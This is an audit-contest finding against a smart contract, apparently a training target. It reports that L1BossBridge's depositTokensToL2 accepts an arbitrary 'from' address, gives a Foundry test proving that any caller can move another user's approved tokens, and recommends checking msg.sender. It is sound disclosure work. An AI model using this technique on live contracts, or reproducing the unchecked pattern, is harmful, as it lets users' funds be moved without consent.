Submission Details
Severity:
Any user can trigger deposit from user that approved L1BossBridge
Summary
Any user can trigger deposit from user that approved L1BossBridge
Vulnerability Details
Given user approved L1BossBridge with L1Token for certain amount, after that any random user can trigger deposition of users funds in the L1Vault of the L1BossBridge.
POC:
In the L1TokenBridge.t.sol add a
randomuser in the test' state:
address random = makeAddr("random");
Add following test:
function testRandomUserCanTriggerAnotherUserDepositTokens() public {
uint256 amount = 10e18;
vm.startPrank(user);
token.approve(address(tokenBridge), amount);
vm.stopPrank();
vm.startPrank(random);
vm.expectEmit(address(tokenBridge));
emit Deposit(user, userInL2, amount);
tokenBridge.depositTokensToL2(user, userInL2, amount);
assertEq(token.balanceOf(address(tokenBridge)), 0);
assertEq(token.balanceOf(address(vault)), amount);
vm.stopPrank();
}
Run the test -> it passes.
Impact
The depositTokensToL2 feature can be highjacked by any user.
Tools Used
Manual code review and automated test
Recommendations
In the function depositTokensToL2(...) ensure msg.sender == from
Updates
Lead Judging Commences
0xnevi almost 2 years ago
Submission Judgement Published Assigned finding tags:
depositTokensToL2(): abitrary from address
Rewards breakdown
nSLOC
99This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.